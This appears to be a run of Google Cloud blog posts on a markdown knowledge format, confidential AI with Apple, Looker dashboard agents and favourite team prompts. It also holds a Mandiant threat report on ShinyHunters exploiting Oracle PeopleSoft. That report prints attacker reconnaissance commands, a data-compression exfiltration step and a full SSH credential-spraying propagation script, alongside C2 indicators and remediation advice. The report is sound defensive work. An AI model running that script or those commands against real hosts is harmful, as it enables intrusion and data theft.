In most organizations, the information that foundation models use is overwhelmingly internal knowledge: the schema of a table, your business’ meaning of a metric, the runbook for an incident, the join paths between two systems, the deprecation notice for an old API, etc.

Today, these atoms of knowledge live in a variety of highly fragmented systems:

Metadata catalogs with their own APIs
Wikis, third-party systems, or in shared drives
Code comments, docstrings, or notebook cells
The heads of a few senior engineers

When an AI agent needs to answer "How do I compute weekly active users from our event stream?" it has to assemble the answer from these scattered, mutually incompatible surfaces. Every vendor offers its own catalog, its own SDK, its own knowledge-graph schema, and none of the knowledge is easily portable across products or organizations.

The result: Every agent builder is solving the same context-assembly problem from scratch, every catalog vendor is reinventing the same data models, and the knowledge itself is locked behind whichever surface created it.

Knowledge as a living wiki

Developer teams are changing how they build AI agents. Instead of using models to search the same documents for the same facts over and over, you can give your agents a shared markdown library that grows more useful over time. This lets your agents take on the drudgery of reading and updating their own files, while your team curates the content and manages it like code.

Andrej Karpathy, the prominent AI researcher and educator, articulates this idea most crisply in his LLM Wiki gist. "LLMs don't get bored, don't forget to update a cross-reference, and can touch 15 files in one pass," he writes. The bookkeeping that causes humans to abandon personal wikis is exactly what LLMs are good at.

Similar knowledge-as-Wiki pattern keeps reappearing under different names: Obsidian vaults wired to coding agents, the AGENTS.md / CLAUDE.md family of convention files, repos full of index.md and log.md artifacts that agents consult before doing real work, and "metadata as code" repositories inside data teams.

The pattern is compelling and powerful, but each instance is bespoke. Karpathy's wiki and your team's wiki and a vendor's catalog export may all look alike (markdown, frontmatter, cross-links), but none of them are intentionally designed to cooperate. There is no agreed-upon answer to what fields every document should carry, or what filenames mean what. As a result, the knowledge encoded in wikis remains siloed within the original teams, leading to redundant effort whenever a new agent is built.

What's missing is a format, not another service

The answer to this problem isn’t another knowledge service. You need a format, a way to represent knowledge that:

Anyone can produce, without an SDK
Anyone can consume, without an integration
Survives moving between systems, organizations, and tools
Lives in version control alongside the code it describes
Is readable by humans and parseable by agents: the same file, no translation layer

By design, OKF is that format.

How OKF works: The design in one screen

An OKF bundle is a directory of markdown files representing concepts: anything you want to capture, including tables, datasets, metrics, playbooks, runbooks, and APIs. Each concept is one file. The file path is the concept's identity:

code_block: <ListValue: [StructValue([('code', 'sales/\r\n├── index.md\r\n├── datasets/\r\n│ ├── index.md\r\n│ └── orders_db.md\r\n├── tables/\r\n│ ├── index.md\r\n│ ├── orders.md\r\n│ └── customers.md\r\n└── metrics/\r\n│ ├── index.md\r\n └── weekly_active_users.md'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2475af0>)])]>

Each concept document has a small block of YAML front matter for structured fields and a markdown body for everything else:

code_block: <ListValue: [StructValue([('code', '---\r\ntype: BigQuery Table\r\ntitle: Orders\r\ndescription: One row per completed customer order.\r\nresource: https://console.cloud.google.com/bigquery?p=acme&d=sales&t=orders\r\ntags: [sales, revenue]\r\ntimestamp: 2026-05-28T14:30:00Z\r\n---\r\n\r\n# Schema\r\n\r\n| Column | Type | Description |\r\n|---------------|-----------|------------------------------------------|\r\n| `order_id` | STRING | Globally unique order identifier. |\r\n| `customer_id` | STRING | FK to [customers](/tables/customers.md). |\r\n\r\n# Joins\r\n\r\nJoined with [customers](/tables/customers.md) on `customer_id`.'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2475850>)])]>

Concepts link to each other with normal markdown links, turning the directory into a graph of relationships that is richer than the parent/child links implied by the file system. Bundles can optionally include index.md files (for progressive disclosure as agents navigate the hierarchy) and log.md files (for chronological history of changes).

The full v0.1 specification (including conformance criteria, cross-linking rules, and the small number of reserved filenames) fits on a single page.

Three principles behind the design

1. Minimally opinionated. OKF requires exactly one thing of every concept: a type field. Everything else (e.g., what types exist, what other fields to include, what sections the body has) is left to the producer. The spec defines the interoperability surface, not the content model.

2. Producer/consumer independence. OKF cleanly separates who writes the knowledge from who consumes it. A bundle hand-authored by a human can be consumed by an AI agent. A bundle generated by a metadata export pipeline can be browsed in a visualizer. A bundle synthesized by one LLM can be queried by another. The format is the contract; the tooling at each end is independently swappable.

3. Format, not platform. OKF is not tied to any specific cloud, database, model provider, or agent framework. It will never require a proprietary account or SDK to read, write, or serve. We're publishing it as an open standard because the value of a knowledge format comes from how many parties speak it, not from who owns it.

What we're shipping with the spec

To make the format concrete, we're publishing reference implementations at both the producer and consumer ends:

An enrichment agent that walks a BigQuery dataset, drafts an OKF concept document for every table and view, then runs a second LLM pass that crawls authoritative documentation and enriches each concept with citations, schemas, and join paths.
A static HTML visualizer that turns any OKF bundle into an interactive graph view in a single self-contained file; no backend, no install on the viewing side, no data leaves the page.
Three ready-to-browse sample bundles: GA4 e-commerce, Stack Overflow, and Bitcoin public datasets, produced by the reference agent and committed to the repo as living examples of conformant OKF.

These are proofs of concept, deliberately. The agent demonstrates one way to produce OKF; nothing about the format requires a specific agent framework or LLM. The visualizer demonstrates one way to consume it; nothing about the format requires HTML or a graph view. We expect (and want!) the ecosystem of producers and consumers to grow far beyond what we've shipped.

Where we go from here

OKF v0.1 is a starting point, not a finished standard. The format will evolve as more producers and consumers emerge and as we collectively learn what knowledge representations agents actually need in practice.

We're publishing in the open from day one because that's the only way a knowledge format earns its name, whether you're building a knowledge catalog, an enrichment pipeline, a wiki tailored to AI agents, or anything in the AI knowledge domain.

From here, we encourage you to:

Read the spec (it's short!)
Write a producer for your source system, your database, your documentation site
Write a consumer: a viewer, a search index, an agent that reasons over bundles
Try the reference implementation against your own data
File issues, send PRs, or propose extensions: The spec is versioned and explicitly designed for backward-compatible growth

The repo, the spec, and the sample bundles are available in GitHub. We have also updated Google Cloud’s Knowledge Catalog to be able to ingest Open Knowledge Format and serve it to our agents. You can find the relevant code and examples here.

The format itself is the contribution. The tools we've shipped exist to make it real, and to lower the cost of trying it out. Whatever shape your knowledge takes today, OKF is designed to be the lingua franca it can be exchanged for tomorrow.

^{Published by the Google Cloud Data Cloud team. Open Knowledge Format is an open specification; contributions, alternative implementations, and adoption beyond Google products are all explicitly welcomed.}

^{In addition to the authors, this work came together thanks to key ideas from many others at Google, and we thank them for their contributions.}

Powering the next era of Confidential AI

Thu, 11 Jun 2026 19:30:00 +0000

At Google Cloud, we’re committed to providing the most advanced, secure, and private infrastructure for the most demanding AI workloads, and partnering with a broad and diverse range of organizations to help them meet their AI workload needs.

We are thrilled to collaborate with Apple on its expanded Private Cloud Compute (PCC) systems announced this week at WWDC 2026. Working closely together, Apple and Google have built a serving platform on Google Cloud that meets the rigorous security, confidentiality, and transparency goals that Apple has for PCC. This achievement is a testament to the strong collaboration between our teams, as well as with Intel and NVIDIA.

Our commitment to privacy with Confidential Computing

Our collaboration with Apple is built on a foundation of deep commitment to privacy that leverages Google Cloud's security and privacy technologies. At the heart of this collaboration is our Confidential Computing portfolio and our Titanium security architecture.

Titanium architecture, featuring our custom-designed Titan chip, provides a hardware root of trust that underpins the security and integrity of Google's infrastructure and services. Confidential Computing builds on this secure foundation by helping ensure data is protected throughout the lifecycle, encrypted at rest, in transit, and crucially in use within hardware-based Trusted Execution Environments (TEEs).

By protecting data in use, Confidential Computing becomes a fundamental and foundational element for building trust in AI systems, providing verifiable integrity and isolation for sensitive workloads. Confidential Computing helps prevent unauthorized access because data remains encrypted and isolated.

Enabling Apple Private Cloud Compute on Google Cloud

We are proud to collaborate with Apple to extend the privacy and security properties of PCC infrastructure to Google Cloud. Our platform supports Apple’s PCC privacy commitments with a layered security approach built upon Google Cloud’s infrastructure, including:

Google Cloud Confidential Computing: Our core Confidential Computing platform provides the hardware-based TEEs necessary for PCC. By leveraging Intel TDX (Trust Domain Extensions) and NVIDIA Confidential Computing, we provide hardware-based isolation for virtual machines, designed to create a highly secure and private environment where workloads can run with cryptographic assurances.
Google Titanium security architecture and Titan chip: Google Titan chips are a key component in powering security and transparency posture for PCC infrastructure on Google Cloud. Deployed across our fleet, Titan establishes a strong hardware root of trust, helping to ensure the integrity of the boot process and the hardware platform itself.
Intel TDX and NVIDIA Confidential Computing: Google Cloud leverages the security features on Intel CPUs and NVIDIA Blackwell GPUs to protect data-in-use during high-performance AI inference, helping ensure that the entire compute path – from CPU to GPU – is protected.
Open-source transparency: With our commitment to verifiable security, Apple and Google have collaborated in engineering an open-source host stack specifically to support PCC's transparency, enabling independent inspection and verification of the system's security properties.

Together, these technologies help ensure that Apple PCC on Google Cloud meets requirements with enforceable protections, no privileged runtime access, and verifiable transparency.

Building the future of private AI infrastructure

Our collaboration with Apple represents a significant milestone in further strengthening a secure cloud for AI by building on technologies and standards from Apple, Google Cloud, Intel, and NVIDIA. By ensuring that every layer of the stack — both hardware and software — contributes to a verifiable and secure system, we’ve created an advanced platform that is designed to uphold the stringent standards of user privacy and data security that PCC architecture demands.

The advancements built through this collaboration will benefit all Google Cloud customers. We are committed to continuous improvement and offering more transparent, secure, resilient platforms for all types of workloads, especially those handling AI and sensitive data.

You can learn more about Confidential Computing here.

Transform dashboards into interactive data experiences with Looker agents

Thu, 11 Jun 2026 16:00:00 +0000

Dashboards have long served as a primary way for organizations to extract insights from data, but they can fall short in agile environments: Dashboards aren’t interactive and don’t allow you to ask follow-up questions. This forces users to step outside their workflows or turn to data analysts to get the answers they need. Today, we are introducing Looker dashboard agents in preview, embedding intelligent, conversational data agents directly within dashboards and empowering users to explore their business intelligence (BI) data using natural language.

Start a conversation with a Looker dashboard agent

Interactive agent-led investigations

Traditionally, dashboards have presented a static view of data. With dashboard agents in Looker, users can explore their data directly within the dashboard interface. Users can start a conversation by clicking the Gemini icon and asking natural-language questions to receive contextual insights.

The accuracy of a data agent depends on the business context it is provided, and its ability to map appropriate metrics and dimensions to users’ inquiries. The Looker dashboard agent has direct context about the user’s applied filters, cross-filters, and pre-curated tiles, helping it to generate highly relevant and accurate answers to complex business questions.

Should a query require more data, the agent can access underlying Explores to uncover additional information. These insights are paired with relevant charts and natural language explanations to simplify data exploration.

Explore data beyond dashboard to uncover deeper insights

Tailor the agent to your business

Data analysts curate dashboards to provide business users with precise perspectives on organizational data. To maintain this kind of consistent and reliable analytical environment, the Looker dashboard agent is highly configurable. Analysts can add context on top of the Looker semantic layer by providing natural-language instructions directly to the agent. This way, they can define exactly how the agent interprets unique business logic and tailors responses for the target audience. By enabling self-serve data analysis, dashboard agents help analyst teams scale to meet the increasing data demands of the business.

Configure Looker dashboard agents

Inherited trust and transparency

For users to adopt an AI-based system, they must trust the information it provides them. When generating an insight, the Looker dashboard agent explicitly shows its work by displaying intermediate reasoning, referenced dashboard tiles, and applied filters. Additionally, the administrator needs to trust users only have access to data and insights to which they are authorized. The dashboard agent is backed by Looker’s governance model, managed through standard permissions.

We are actively working on additional capabilities for the Looker dashboard agent, including support for iframe embedding, allowing organizations to bring dashboard agents alongside Looker dashboards into any essential portal or application.

Enable dashboard agents today

With Looker version 26.08.11 and later, administrators can activate the dashboard agent capability by toggling "Enable Chat with Dashboard" within the Gemini in Looker settings. Once enabled, authorized users will see the Gemini icon and can begin chatting with their dashboard data immediately. Please explore our support documentation for more detailed information.

ShinyHunters Targets Education Sector with Oracle PeopleSoft Exploit

Thu, 11 Jun 2026 14:00:00 +0000

Introduction

Mandiant and Google Threat Intelligence Group (GTIG) have identified an active compromise and extortion campaign attributed to UNC6240 (ShinyHunters) targeting Oracle PeopleSoft application infrastructure. The activity was observed between May 27, 2026, and June 9, 2026 and is consistent with the exploitation of CVE-2026-35273, a critical remote code execution vulnerability (CVSS 9.8) in the Environment Management component. The exploitation of this vulnerability directly aligns with the observed targeting of Environment Management Hub (PSEMHUB) endpoints. Because this activity predates Oracle's June 10, 2026 advisory, the vulnerability was exploited as a zero-day.

Upon becoming aware of active scanning and exploitation, we initiated notifications to over 100 global organizations whose IP addresses correlated with potentially vulnerable endpoints. Most of these organizations were based in the United States, and 68 percent operated within the higher education sector. Subsequently, public reports by @nahamike01 on X highlighted open attacker directories on the staging servers, allowing GTIG to perform a detailed triage of the threat actor's operations.

The attacker staging environments hosted customized MeshCentral agents masquerading as legitimate cloud endpoints, which they used to run administrative command queries and deploy a custom lateral movement and defacement script, [victim_abbreviation]_fanout.sh. This campaign directly correlates with subsequent data leaks of stolen organization data published on the ShinyHunters Data Leak Site (DLS) on June 9, 2026.

We recommend that organizations running Oracle PeopleSoft take the following immediate actions to best defend themselves. Additional remediation and hardening guidance is included later in this post.

aside_block: <ListValue: [StructValue([('title', 'Remediation and Hardening Quick Guide'), ('body', <wagtail.rich_text.RichText object at 0x7f1ee3632ee0>), ('btn_text', ''), ('href', ''), ('image', None)])]>

Threat Detail & Campaign Overview

On June 9 2026, public threat reports highlighted open attacker directories. GTIG triaged five sequential IP addresses: 142.11.200.186, 142.11.200.187, 142.11.200.188, 142.11.200.189, and 142.11.200.190. These systems were hosting Python SimpleHTTP servers on port 8888, exposing directory contents that included staging materials, customized agents, and attacker command histories.

The staging infrastructure hosted pre-configured Windows MeshCentral agent binaries disguised as Microsoft Azure services, specifically named meshagent32-azure-ops.exe, meshagent64-azure-ops.exe, and meshagent64-v2.exe. MeshCentral is an open-source remote management server; its agent is software that runs on remote devices to allow for remote management across various operating systems, including Windows, Linux, macOS, and FreeBSD. Static analysis indicates these agents were hardcoded to establish communication with the command and control (C2) server wss://azurenetfiles.net:443/agent.ashx. The domain azurenetfiles.net was chosen to mimic legitimate Microsoft Azure NetApp Files endpoints, a common masquerading tactic. An unconfigured Linux meshagent binary was also staged, suggesting that the threat actors passed parameters dynamically via the command line during deployment.

Global Notification Response Campaign

Prior to the discovery of the open staging directories, we began an effort to alert over 100 exposed organizations to assist in restricting access to vulnerable endpoints. These organizations are significantly concentrated in the Higher Education sector; 68 percent are academic institutions, including universities and colleges worldwide.

While several organizations successfully blocked the activity or remediated the vulnerabilities, others experienced compromise, resulting in stolen data being published on the ShinyHunters DLS.

Technical Analysis & Command History

The exposed .bash_history file, which was identical across all five staging hosts, outlines the server configuration and administrative actions. The technical narrative begins with the configuration of the staging environment. On May 27, 2026, at 22:14 UTC, the attackers installed the MeshCentral remote management server (version 1.1.59) to establish their C2 staging environment. Shortly after, at 22:25 UTC, they installed the acme-client npm package to automate the provisioning of Let's Encrypt SSL certificates for the masquerading domain "azurenetfiles.net". The attackers interacted with compromised systems using the MeshCentral command-line interface utility meshctrl.js.

The command history shows the threat actors performing targeted reconnaissance within compromised internal networks. They mapped Oracle PeopleSoft configurations by inspecting mount points, checking the process scheduler configuration file psappsrv.cfg, and reading WebLogic server XML configurations (config.xml). The session log ends with the attackers establishing an outbound SSH connection from their staging system to 176.120.22.24, which hosts the public clearnet mirror of the ShinyHunters DLS.

An analysis of the exposed command history reveals the key administrative and malicious operations performed by the threat actors on the staging servers (timestamps were not available in every case):

1. Staging Infrastructure Setup:

May 27, 2026, 22:14 UTC: Installed MeshCentral (v1.1.59) and 22:25 UTC: Installed "acme-client" to establish the C2 staging environment and automate SSL certificate provisioning for azurenetfiles.net.
Staged the compiled Windows agent binaries (meshagent32-azure-ops.exe, etc.) designed to communicate back to the C2 address: wss://azurenetfiles.net:443/agent.ashx.
May 29, 2026, 18:46 UTC: The attackers checked for the availability of the "authenticode" tool on the staging system using the command npm list global authenticode. This command would return any npm package with a name starting in 'authenticode', such as authenticode-sign, used for signing binaries, or authenticode, used for examining metadata on a file.

2. Targeted Internal Reconnaissance:

Leveraged the MeshCentral CLI utility meshctrl.js to execute administrative command queries on compromised remote endpoints: hostname; id.
Mapped Oracle PeopleSoft system configurations by inspecting the process scheduler configuration file (psappsrv.cfg) to extract machine names and IP addresses:

grep -hE '\''^[[:space:]]*Address=|^[[:space:]]*HostName='\'' /u01/app/psoft/ps_config_homes/csprd/appserv/prcs/psappsrv.cfg 2>/dev/null | head -80

Audited network configurations and active mounts on compromised hosts: mount | grep -E "psoft|ps_config|nfs".
Mapped internal subnet hosts by querying local hosts tables: cat /etc/hosts | grep -E "[redacted_victim_string]".
Inspected WebLogic XML configurations (config.xml) to map internal application servers.

3. Lateral Movement & Script Propagation:

Wrote the lateral propagation script [victim_abbreviation]_fanout.sh via a heredoc to /tmp on the staging host.
Triggered the execution of the propagation script on compromised hosts using the MeshCentral command execution feature:

node meshctrl.js RunCommand --loginuser admin --loginpass '[password]' --id '[agent_id]' --run 'bash /tmp/[victim_abbreviation]_fanout.sh'

Verified propagation success by running remote checks for the defacement marker file README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT.

4. Exfiltration & DLS Connection:

Compressed exfiltrated directories containing stolen data using zstd:

pv -s "$(du -sb exfil | awk '{print $1}')" | zstd -3 -T0 -o exfil.tar.zst

Concluded operations by establishing an outbound SSH connection from the staging host to 176.120.22.24, the IP address hosting the public mirror of the ShinyHunters Data Leak Site.

Figure 1: ShinyHunters DLS Post showing Peoplesoft victim added June 9, 2026

Propagation Script & Lateral Movement

As observed in the .bash_history log, the threat actors wrote a propagation script named [victim_abbreviation]_fanout.sh directly to the /tmp directory of the compromised system. This script automates SSH credential spraying against internal hosts by parsing hostnames from the local /etc/hosts file matching a specific naming pattern. The script attempts authentication using a hardcoded list of common administrative and application-specific usernames and passwords.

Upon establishing a successful SSH session, the script copies a defacement and extortion marker file named README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT into the WebLogic and Process Scheduler directories. This staging and deployment activity directly correlates with the publication of stolen archives on the ShinyHunters DLS on June 9, 2026.

The redacted contents of the propagation script [victim_abbreviation]_fanout.sh are as follows:

set +e
SRC="/u01/app/psoft/ps_config_homes/csprd/webserv/CSPRD02/README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT"
NAME="README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT"
BASE="/u01/app/psoft/ps_config_homes/csprd"
export PATH=/usr/bin:/bin
# hosts from /etc/hosts — internal PS nodes only
HOSTS=$(grep -E '[redacted_victim_host_pattern]|csprd[0-9]' /etc/hosts | awk '{print $2}' | grep -v '^#' | sort -u)
echo "HOSTS=$(echo $HOSTS | wc -w)"
PWDS="[redacted_passwords]"
USERS="[redacted_usernames]"
OK=0; FAIL=0; SKIP=0
for h in $HOSTS; do
  echo "=== $h ==="
  copied=0
  for u in $USERS; do
    for p in $PWDS; do
      sshpass -p "$p" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=6 -o BatchMode=no $u@$h "hostname" >/dev/null 2>&1 && {
        for dest in $BASE/webserv/CSPRD $BASE/webserv/CSPRD02 $BASE/appserv/prcs; do
          sshpass -p "$p" ssh -o StrictHostKeyChecking=no $u@$h "test -d $dest && mkdir -p $dest && cat > $dest/$NAME" < "$SRC" 2>/dev/null && echo "  OK $dest ($u)" && OK=$((OK+1)) && copied=1
        done
        break 2
      }
    done
  done
  if [ $copied -eq 0 ]; then
    # try key-based
    ssh -o StrictHostKeyChecking=no -o ConnectTimeout=6 -o BatchMode=yes $USER@$h "hostname" >/dev/null 2>&1 && copied=1 || true
    if [ $copied -eq 0 ]; then echo "  FAIL ssh"; FAIL=$((FAIL+1)); fi
  fi
done
# local paths on this host
for dest in $BASE/webserv/CSPRD $BASE/webserv/CSPRD02 $BASE/appserv/prcs; do
  if [ -d "$dest" ]; then cp -f "$SRC" "$dest/$NAME" && chmod 644 "$dest/$NAME" && echo "LOCAL OK $dest"; fi
done
echo SUMMARY ok=$OK fail=$FAIL
find $BASE -name "$NAME" -type f 2>/dev/null

Remediation and Hardening

To defend against this campaign, we recommend that organizations running Oracle PeopleSoft immediately implement the following security measures:

Network Isolation & WAF Rules

Endpoint Access Restrictions: If you cannot disable the EMHub Service, immediately block external network access to the sensitive endpoints /PSEMHUB/* (specifically /PSEMHUB/hub) and /PSIGW/HttpListeningConnector at the network perimeter or firewall level. Relying solely on Web Application Firewall (WAF) body-inspection rules is insufficient, as these controls can be bypassed.
Non-Breaking Action: Restricting these endpoints is considered non-breaking for standard end-user operations. The Environment Management Hub (EMHub) and the Integration Broker Listening Connector are administrative or system-to-system components and are not required for the core user-facing PeopleSoft Internet Architecture (PIA) browser sessions.

Log & Endpoint Monitoring

Access Log Analysis: Audit the PIA WebLogic access logs for HTTP POST requests directed at /PSEMHUB/hub and /PSIGW/HttpListeningConnector originating from external or untrusted source IP addresses.
SSRF Detection: Analyze requests to /PSIGW/HttpListeningConnector for loopback IP addresses (such as 127.0.0.1, localhost, or ::1) or internal IP ranges passed within request headers or parameters. This is a common method for attackers to perform Server-Side Request Forgery (SSRF) to bypass access controls.

Network Telemetry

Outbound Port 445 Monitoring: Monitor outbound firewall logs and NetFlow data for outbound SMB traffic (TCP port 445) originating from PeopleSoft hosts to untrusted, external internet destinations. The exploit chain may coerce the system into making outbound connections in an attempt to capture Windows machine-account NetNTLM hashes.

Host-Level Auditing & Filesystem Checks

Conduct a thorough forensic audit of the web-tier filesystem on PeopleSoft hosts for indicators of compromise:

Webshell Detection: Scan the WebLogic web application directory <PS_CFG_HOME>/webserv/<domain>/applications/peoplesoft/PSEMHUB.war/ for any unexpected *.jsp files that are not part of the shipped product.
Unauthorized Staging: Inspect the staging directory .../PSEMHUB.war/envmetadata/transactions/ for unauthorized folders, files, or binary drops.
Unexpected Directories: Look for unexpected directories named logs, persistantstorage, or scratchpad under the PSEMHUB directories.
XMLDecoder Persistence: Check <docroot>/envmetadata/data/environment/ for recently created or modified .xml files, which may be leveraged by threat actors to execute remote code via XMLDecoder upon application restart.

In alignment with Oracle’s security advisory, we consider the implementation of these mitigations to be a high-priority risk reduction measure and strongly recommend immediate action to address the identified exposure. As this vulnerability is remotely exploitable without authentication and may result in remote code execution, organizations must remain on actively supported versions and apply all Critical Patch Updates, Critical Security Patch Updates, and Security Alerts without delay. Review the full Oracle Security Alert Advisory - CVE-2026-35273 for complete details.

Indicators of Compromise (IOCs)

To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI collection for registered users.

Staging & C2 Network Indicators

142.11.200.186
142.11.200.187
142.11.200.188
142.11.200.189
142.11.200.190
azurenetfiles.net

Staging Payloads & Attacker Files

File Path / Name	Indicator Type	Description	Value / Hash (SHA-256)
`.bash_history`	File Hash	Attacker command history	`2ab684d93c1553fad87041b4dea97188a97e78589deee2a7bacff905564f3a35`
`meshagent64-azure-ops.exe`	File Hash	Pre-configured Windows agent	`f02a924c9ff92a8780ce812511341182c6b509d45bc59f3f7b522e37225d24fc`
`meshagent64-v2.exe`	File Hash	Pre-configured Windows agent	`d83fdb9e53c5ff03c4cb0451ea1bebd79b53f29eadc1e2fa394c7af13a86ce2f`
`meshagent32-azure-ops.exe`	File Hash	Pre-configured Windows agent	`c7e9332731b06644fc73e0046a2a89eaa59b09f54250e9bd622467187351711f`
`meshagent`	File Hash	Unconfigured Linux agent	`68257a6f9ff196179ec03624e849927f26599eb180a7c82e14ef5bc4e93bc309`
`README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT`	Filename	Defacement / extortion marker	N/A
`[victim_abbreviation]_fanout.sh`	Filename	Propagation script	N/A

Google Security Operations (SecOps)

SecOps customers will have access to the following pending-deployment rules. Once fully deployed, these rules will be available under the Mandiant Frontline Threats rule pack:

Oracle PeopleSoft Configuration Inspection
Oracle PeopleSoft Suspicious JSP File Write to PSEMHUB
Sshpass Interactive File Deployment
Data Archiving or Compression via Zstd Utility
MeshCentral Command Execution via Meshctrl

10 Indispensable Prompts Our Team Refuses to Build Without

Thu, 11 Jun 2026 07:00:00 +0000

Look at any builder's prompt history and you'll see a collection of highly specific, sometimes chaotic, one-off prompts. We use AI to debug a single error message, refactor a messy email, or generate a quick boilerplate.

If you sit down with people who consistently ship high-quality work, you'll find something interesting. They aren't just improvising. They have a set of go-to prompts they have tweaked and improved over time and used on nearly every project.

I asked some of my peers and leaders a simple question: "What prompt do you use most often, and why?"

What they shared wasn't just a list of arbitrary commands. Here's the unfiltered look at the prompts our team refuses to ship without, and more importantly, why they use them.

Build a spec

Maja Bilić

Senior Outbound Product Manager • Engineering

Follow on LinkedIn

Prompt:

code_block: <ListValue: [StructValue([('code', "Act as a cynical Principal Architect and Technical PM. I want to build a [product] that allows [user] to do [action]. Do not write code. Analyze this concept and list the top 5 technical, UX and architectural considerations. Then ask me key questions for each of the 5 considerations so we can work together on building the spec. Once you have all the answers, create a PRD doc and implementation plan. Don't over engineer or over simplify the design or implementation plan."), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee3523220>)])]>

Why? I have written bad product requirements documentations (PRDs), and I have read many bad PRDs. This prompt ensures I use the persona of a cynical Architect / PM who helps distill the idea, critique the approach and concept, and collaborate on defining the most important pieces. This way I make sure I work through the plan with an agent's help while also developing the product design idea further. I also love the guardrail of not over engineering or over simplifying things; AI tends to do that sometimes, especially when writing product design docs.

Widget tests

Andrew Brogdon

Staff Developer Relations Engineer • Engineering

Follow on X, LinkedIn

Prompt:

code_block: <ListValue: [StructValue([('code', "I'd like to partner with you on increasing the robustness of this project by creating widget tests. If you haven't already, please read the Flutter team's skill for creating widget tests (https://github.com/flutter/skills/tree/main/skills/flutter-add-widget-test). Then, let's do these things:\r\n\r\n* Examine my application's codebase to identify areas of the UI/UX that are not being tested properly.\r\n* Determine if the existing code is written in a testable way (are dependencies injected? Are domains loosely or tightly coupled? Etc.).\r\n* Determine which domains require more rigor than others.\r\n* Create an overall testing plan for the application.\r\n* Determine which areas of functionality are already aligned with that plan, and which are missing tests.\r\n* Create a plan to implement those tests.\r\n* Execute that plan.\r\n\r\nDo not proceed from one step to another unless you are completely confident about your reasoning. You are encouraged to as many questions as needed."), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee3523280>)])]>

Why? My favorite use of agentic coding tools is to actually do all the things I used to feel guilty about not doing in my projects. Proper testing is definitely on that list. The official skills from the Dart/Flutter team do a great job of instructing agents on what good widget tests look like, so combining it with this prompt (which essentially just fits those steps into my own coding workflow) helps me reduce the toil required to maintain reliable, guilt-free codebases.

Find all the tests / Clean-up commit

Aja Hammerly

Director of Builder Relations • Engineering

Follow on X, LinkedIn

Prompt:

code_block: <ListValue: [StructValue([('code', 'Run all the tests and identify any missing tests and write them. Pay special attention to edge cases and race conditions.'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee3523130>)])]>

code_block: <ListValue: [StructValue([('code', "Find any unused code, embarrassing comments, comment to code inconsistencies, unresolved TODOs, or other things in this commit that shouldn't be in there."), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee35234c0>)])]>

Why? I find that when I'm working on code I'll often get extremely focused on the "happy path", the main path I want a user to take through the code. While I'm focused on that I'll put in TODO or FIX comments on edge cases I don't want to think about yet. I'll also forget to update comments and leave debugging comments in sometimes. And while I try to follow test driven development, I don't always get tests in on all the edge cases. I run these two prompts, usually in a new conversation without the development context as a first round of code review before submitting to an AI or human reviewer for the next step. This ensures that what I've built is in good shape for others to review and use.

Check for correct and compliant permissions

Rich Hyndman

Head of Antigravity Developer Relations • Engineering

Follow on X, LinkedIn

Prompt:

code_block: <ListValue: [StructValue([('code', "Run a comprehensive check on this Android project to ensure all permissions are correct and compliant. Perform the following steps:\r\n1. Locate and analyze all 'AndroidManifest.xml' files (including main, debug, and flavor-specific manifests), extract a master list of declared <uses-permission> tags. \r\n2. Cross-reference these declared permissions against the codebase to verify where they are actually used. Identify any bloatware or unused permissions that can be safely removed.\r\n3. Check the Kotlin/Java source files to ensure that all runtime permissions implement the dynamic runtime permission request flow 'checkSelfPermission','onRequestPermissionsResult' or the Activity Result API.\r\n4. Verify that any hardware features associated with the permissions (like android.hardware.camera) are correctly declared. \r\nOutput your findings as a Markdown report. Provide file paths and suggested code diffs for any fixes. Do not make any file edits until I approve the plan."), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee3523c40>)])]>

Why? Antigravity, with Gemini 3.5 Flash and the Android plugin is an excellent Android development partner! Checking for the correct permissions can keep your app running smoothly and help avoid delays when uploading to the Play Store.

Conduct code review

Shir Meir Lador

Head of AI, Developer Relations • Engineering

Follow on X, LinkedIn

Prompt:

code_block: <ListValue: [StructValue([('code', 'Act as a strict, highly analytical Principal Engineer conducting a pre-production code review. You have incredibly high standards and zero tolerance for fragile, "happy-path" code. Your goal is to guide me to write bulletproof, production-ready systems.\r\nGrade my uncommitted changes on an A-to-F scale for production readiness. \r\nDo not award an "A" unless my code is exceptionally robust. Specifically, analyze the changes for:\r\n1. Efficiency: Redundant API calls, wasteful database queries, or un-cached resource leaks.\r\n2. Resilience: Silent failure points, lack of explicit error boundaries, and missing rate-limit fallbacks.\r\n3. Architecture: Tight coupling and lack of clear separation of concerns.\r\nFor every issue, explain pragmatically where the code is vulnerable to real-world production failures. Then, provide the exact git diffs needed to upgrade my code and earn that "A."'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee3523970>)])]>

Why? If you ask an LLM to review your code, it almost always defaults to being polite. It tells you your naming is clean, suggests a few docstrings, and hands you a green checkmark. But polite reviews don't prevent production outages. I like this prompt because it completely cuts through that AI fluff. By forcing the model to grade your work on a harsh scale and demanding a working git diff to fix it, you turn it into a real partner. It stops guessing and starts actually reading your network calls and database queries to find where the code is going to break. It’s like having an uncompromising senior dev sitting over your shoulder, pointing out exactly where you got lazy, and then handing you the exact code to fix it.

Explain trade-offs to aid decision-making

James O'Reilly

Staff Developer Relations Engineer • Engineering

Follow on X, LinkedIn

Prompt:

code_block: <ListValue: [StructValue([('code', "Explain the pros and cons of executing your suggested Implementation Plan. Be specific about the trade-offs we're making related to perforance, cost, security and maintainability so I can make an informed decision on how to proceed."), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee3523550>)])]>

